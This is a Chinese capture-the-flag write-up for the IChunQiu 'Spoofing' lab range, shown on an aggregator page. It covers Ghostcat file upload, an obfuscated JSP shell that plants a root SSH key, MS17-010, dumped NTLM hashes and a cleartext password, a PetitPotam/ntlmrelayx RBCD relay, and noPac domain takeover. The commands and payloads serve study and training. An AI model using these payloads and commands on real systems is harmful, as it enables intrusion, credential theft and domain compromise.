服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

赏金猎人:IChunQiu云境-Spoofing Writeup

日期: 来源:Gcow安全团队收集编辑:xiaoli@绝影小组

赏金猎人:IChunQiu云境-Spoofing Writeup

Author:Xiaoli-小离

0x00 - Intro

  • • 2022年12月5号开始,于次日获得一血,斩获1000元奖励 

0x01 - Info

  • • Tag: Tomcat,NTLM,WebClient,Coerce Authentication,noPac 


0x02 - Recon

  1. 1. Target external ip47.92.146.66

  2. 2. Nmap results
    Focus on port 8009 (ajp) ,意味着是tomcat (对应了靶场的tomcat tag) 

  3. 3. 目录扫描,404页面显示为tomcat 9.0.30 

  4. 4. Playing with Ghost cat 使用该项目测试 https://github.com/00theway/Ghostcat-CNVD-2020-10487
    读取/web-inf/web.xml

  5.    
    url-pattern 结果存为字典

  6.    
    FFuf

  7.    
    关注uploadservlet

  8.    
    上传temp.txt

  9.    
    返回文件地址

  10.    

  11.   ./upload/7dbbdee357b4472f5aad6b8ce83980dd/20221206093440839.txt
    替换 ./upload to /upload,成功读取到上传的文件python3 ajpShooter.py http://47.92.146.66:8080 8009 /upload/7dbbdee357b4472f5a

  12. ad6b8ce83980dd/20221206093440839.txt read

       

0x03 - GhostCat命令执行

  1. 1. 准备好 shell.txt 

  2. <% java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDL3NKaDY4Uk5hWktLakNQaE40WUxpSnJ4eDR3N3JtbDBGcFRmMTNYNHVKZlpFZm4yU25scE9rdXQ0OE1LdURHOEtDcXczRW0zNU9odXdUa2p3ZEkvRGhGN3ZSeTB0T2xtWDE5NmJHcXpndE5pM1YzUHExc3NCMzV5Ui85SHJ6ZjVEdHdqS2NKdkphV0RuZzU2UWhHZjlnR21vdUZVQWV2QjdsUWl3a01FNWNxTzVsQTRwUm5KVEh2RU1OQUkxQkc3MTBEeWNKT28rNGh1TGNNVjZhdUs3UXdKTWdnN0oyU2U5TEpGZWk2R2g0amJUSGRhdmNBVjV6VVJZeFI4QVNXSmNqY29tM2dMUEE1UWNxSzNzSERRVmswUHllaTR3cEJwWWlFUGlHcHlQR2Y1T3ErUU0xQmJyR0gvTlRBYnZWa3dDZnBkRURWdVBNNWhHOFY4c09HTjIxczlWazFjMVBXaEh2WDZ1ejhRaDRNdUdnQlRYSHlZb3duTjg3OTExVDVGR0VjVzlWeUh1cm9FSVJtdE9sY3dBYmRMc0k0NVhOS1o0aWoxdERLNTRTMmpXWXhJTjhSL1ZuUnV2RVVoTVpGOUlabDM3UW5EQnBFR25LTXFjTVE4cHVUZUJBMngvSURHMFR6MWxjVGk5WHp5WjVheTd4dTJwZStidXhWT1BSQ2M9IiA+PiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5cwoKY2htb2QgNjAwIC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCg==}|{base64,-d}|{bash,-i}").getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(""); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("");%>

  3. 2. 上传shell.txt

  4. 3. 执行上传的代码

  5. 4. SSH - flag01 

0x04 - 入口 Ubuntu: 172.22.11.76

  1. 1. SSH 

  2. 2. 没啥东西,直接过

  3. 3. 开代理

  4. 4. 挂代理扫445,获取到三台主机信息 172.22.11.45 XR-Desktop.xiaorang.lab 172.22.11.6 xiaorang-dc.xiaorang.lab 172.22.11.26 XR-LCM3AE8B.xiaorang.lab   

  5. 5. 关注172.22.11.45 - windows7 - MS17

  6. 6. MS17 一气呵成 

  7. 7. 基本操作

  8.    


  9.   


  10. 凭据列表

    1. Administrator 4430c690b4c1ab3f4fe4f8ac0410de4a - (本地凭据)

    2. John 03cae082068e8d55ea307b75581a8859 - (本地凭据)

    3. XR-DESKTOP$ 3aa5c26b39a226ab2517d9c57ef07e3e - (域凭据)

    4. yangmei 25e42ef4cc0ab6a8ff9e3edbbda91841 - xrihGHgoNZQ (明文) - (域凭据)


本人已经试过组合爆破了,没有东西,这边直接略过演示,直接到域渗透环节 

  1. 8. Flag2

  2. 9. 把域用户yangmei加入该机器的本地管理员

  3. 10. 确定域控IP为172.22.11.6 - xiaorang-dc

  4. 11. Bloodhound收集 

     

0x05 - 域渗透环节, 入口 XR-Desktop: 172.22.11.45

  • • 这边快速过一下 (一句话总结:不能直接拿下域控)

    1. 1. 使用Bloodhound收集到的用户名组合获取到的密码/hashes组合爆破,没发现其他新用户

    2. 2. MAQ = 0,加不了计算机

    3. 3. 当前LDAP 没 TLS,远程也加不了计算机,impacket的addcomputer有两种方法samr和ldaps。samr受到MAQ = 0的限制,无法添加计算机;ldaps受到 没TLS + MAQ = 0 的限制

    4. 4. 域控存在nopac,当前用户yangmei使用nopac没打死,并且对域内computer container没有createchild的ACL

    5. 5. 域控存在nopac,当前用户yangmei对当前windows机器xr-desktop没WriteDacl权限,意味着无法修改SamAccountName

    6. 6. 域内存在 DFscoerce 和 petitpotam,但是不存在CVE-2019-1040,因此放弃 DFscoerce,优先使用petitpotam

    7. 7. NoPac exploit: https://github.com/Ridter/noPac

  1. 1. Petitpotam 扫描

  2. 2. 无ADCS + Petitpotam + ntlm中继打法
    攻击链:用petitpotam触发存在漏洞且开启了webclient服务的目标,利用petitpotam触发目标访问我们的http中继服务,目标将会使用webclient携带ntlm认证访问我们的中继,并且将其认证中继到ldap,获取到机器账户的身份,以机器账户的身份修改其自身的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性,允许我们的恶意机器账户模拟以及认证访问到目标机器 (RBCD)

  • • 满足条件,目标机器需要开启webclient服务
    WebClient扫描,确定只能拿下 172.22.11.26 (XR-LCM3AE8B) 

  • • 中继攻击前言:

    • • 实战中的中继打法只需要停掉80占用服务,开启端口转发(portfwd,CS在后续版本中添加了rportfwd_local,直接转发到客户端本地)

    • • 本次演示类似实战的打法,不选择把impacket丢到入口ubuntu上面这种操作

  1. 3. 中继攻击环境配置: 端口转发 + 代理
    我们目前需要把服务器的80,转发到客户端本地的80

  • • 注意:由于SSH的反向端口转发监听的时候只会监听127.0.0.1,所以这时候需要点技巧
    如图所示,即使反向端口转发79端口指定监听全部 (-R \*:79:127.0.0.1:80),端口79依旧绑定在了127.0.0.1(图中顺便把socks5代理也开了) 

  •    
    加多一条socat,让流量 0.0.0.0:80 转发到 127.0.0.1:79,再反向转发回客户端本地的80 ,变相使80监听在0.0.0.0

  •    
    测试,从172.22.11.76:80 进来的流量直接转发到了我们本地 

  •    
    本地开启ntlmrelayx


  • • 注意:

    • • 前面提到,没有ldaps,所以不能使用addcomputer

    • • 同时在使用proxychains后,ldap://后面只能接dc的ip

    • • 利用前面拿下的XR-Desktop作为恶意机器账户设置RBCD
      sudo proxychains4 -q -f proxychains.conf ntlmrelayx.py -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access

  1. 4. 使用Petitpotam触发 XR-LCM3AE8B 认证到172.22.11.76 (ubuntu)
    proxychains4 -q -f ~/HTB/Spoofing/proxychains.conf python3 PetitPotam.py -u yangmei -p 'xrihGHgoNZQ' -d xiaorang.lab ubuntu@80/pwn.txt XR-LCM3AE8B
    可以看到,已经完成RBCD攻击了,接下来就是直接申请XR-LCM3AE8B的银票了 !

  2. 5. 申请XR-LCM3AE8B CIFS票据

0x06 - 域渗透环节 - NoPAC, 入口 XR-LCM3AE8B:172.22.11.26

  1. 1. psexec

  • • flag03在 C:\users\administrator\flag\flag03.txt (这里没截图)

  1. 2. smbclient.py 传 mimikatz

  2. 3. 获取到新凭据zhanghui 1232126b24cdf8c9bd2f788a9d7c7ed1

  3. 4. nopac

  • • 只有zhanghui能成功,zhanghui在MA_Admin组,MA_Admin组对computer 能够创建对象,但是在bloodhound没看到 AdFind.exe -b "CN=Computers,DC=xiaorang,DC=lab" nTSecurityDescriptor -sddl+++ 

  •    
    Bloodhound看不到,主要原因是没把CreateChild采集进json

     

  1. 5. 回到nopac,加上 create-child 参数

0x07 - 域渗透环节 - xiaorang-dc

  1. 1. 使用nopac申请到的cifs票据登录进入DC

  • • flag04在 C:\users\administrator\flag\flag04.txt (这里没截图)

  1. 1. 域管 (略过使用mimikatz) administrator 0fadb57f5ec71437d1b03eea2cda70b9 

0x08 - 瞎玩

  1. 1. 尝试解决Bloodhound.py采集不到CreateChild
    bloodhound/enumeration/acls.py里面其实已经定义好了变量,只需要调用即可

  2.    
    来到170行,我们添加上去,找到CreateChild就添加进数据

  3.    
    重新跑一遍bloodhound.py,观察containers的结果,发现已经有相关数据了,RID 1132 = MA_Admin组

  4.    
    Bloodhound示意图,但是数据还是乱

  5.   


相关阅读

  • 吊打同行,功能超强大,绝对刚需

  • 今日分享嗨喽,大家好!!!最近发现一款非常不错的短视频解析软件,功能相当的丰富,而且对比传统的短视频解析软件,这款软件也是相当新颖,一种全新的模式,全新的界面。解析机器人(安卓)打开
  • 创新甄选激励计划招募再上新台阶!

  • 2022年度英特尔合作伙伴联盟创新甄选激励计划自8月月底启动至今,在各地创新生态合作伙伴的大力支持下,取得了阶段性成果!新招募创新创业企业近百家,覆盖智能硬件、智能机器人、
  • 自动化信息工作流·Inotify+msgpusher使用介绍

  • 导语:信息流的产生离不开各类信息传递的生产工具,通过了解和使用能够帮助我们更好、更快的完善属于自己的信息工作流Inotify和msgpusher两者都属于开源信息推送工具,不同的是In
  • 未来城市如何组织运输和出行|未来城市大哉问

  • 腾讯研究院&澎湃研究所&清华大学建筑学院龙瀛课题组设计未来城市,并使其能够生长,就要思考和理解城市。针对有关城市的大问题,我们访谈了许多处在前沿的思考者和实践者,包括建筑
  • 基于AD Event日志检测NTDS凭据转储攻击

  • 01、简介在域环境里,域内用户hash存储在域控制器(ntds.dit)中的数据库文件中,ntds.dit文件是无法直接被复制的。在这种情况下,我们一般可以利用卷影复制服务(VSS)来实现ntds.di
  • 周日活动获奖名单

  • 今天公布一下周日活动的获奖名单哦~~上周活动的中奖观众是——鸣佐请务必在两天内加入微信群并主动@阿正领奖哦。如果,你不知道微信群在哪的话~~微信添加机器人三号(阿正很早
  • 机器人小黄人

  • 淘宝天猫这两个软件应该不陌生吧!!那你们买东西的时候,都有过优惠券吗?答案应该肯定的,毕竟大家买东西的时候,价格能减点更开心啦!于是花姐整了一个查找优惠券的机器人,这机器人

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 赏金猎人:IChunQiu云境-Spoofing Writeup

  • 赏金猎人:IChunQiu云境-Spoofing WriteupAuthor:Xiaoli-小离0x00 - Intro• 2022年12月5号开始,于次日获得一血,斩获1000元奖励 0x01 - Info• Tag: Tomcat,NTLM,WebClient,Coerc
  • 万物至此皆长大|仓生

  • 前言 几近夏日,慵懒的午休之后,我突然想起自己曾经写过某篇小说。并幻想能在此刻坐在空调间,与轻小说一般的美少女主角一起读冒险故事,等待日落。遗憾的是,即便
  • 你的大学 - 填报志愿锦囊

  • Hello,我是云游君。我的梦想是不用上班。如题,最近我和 B 站合作做了一个填报志愿锦囊。百位学长学姐填报志愿锦囊|BiliBili其大致功能相当于各专业情况汇总、院校介绍、填报方
  • 云乐坊工作室的成立与缘起与有关的话

  • 起因 18 年春天的某个午后,我突发奇想买下了 yunle.fun 这个域名。并在站点编年史中如下记载:又注册了个新域名:yunle.fun(云乐坊),以后要是能开工作室就用这个名字吧(笑)。云乐坊
  • 双十一攻略手册

  • 正如上篇所言,借双十一的时机,我与几位小伙伴进行了尝试。并有了这样一个产物:双十一攻略手册( https://app.yunle.fun/single-day-strategy/ )可点击「阅读原文」查看它的攻略数